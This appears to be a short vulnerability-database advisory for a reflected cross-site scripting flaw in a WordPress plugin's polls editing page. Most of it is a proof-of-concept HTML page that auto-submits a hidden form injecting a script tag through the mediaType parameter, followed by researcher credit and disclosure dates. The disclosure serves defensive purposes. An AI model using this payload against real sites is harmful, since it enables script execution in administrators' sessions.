The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting
<html> <body> <form action="https://example.com/wp-admin/edit.php?post_type=feedback&page=polls&action=edit" id="hack" method="POST"> <input type="hidden" name="mediaType[999999999]" value=""><script>alert(/XSS/)</script>" /> <input type="submit" value="Submit request" /> </form> </body> <script> var form1 = document.getElementById('hack'); form1.submit(); </script> </html>
ZhongFu Su(JrXnm) of WuHan University
ZhongFu Su(JrXnm) of WuHan University
Yes
2022-07-18 (about 6 months ago)
2022-07-18 (about 6 months ago)
2022-09-26 (about 4 months ago)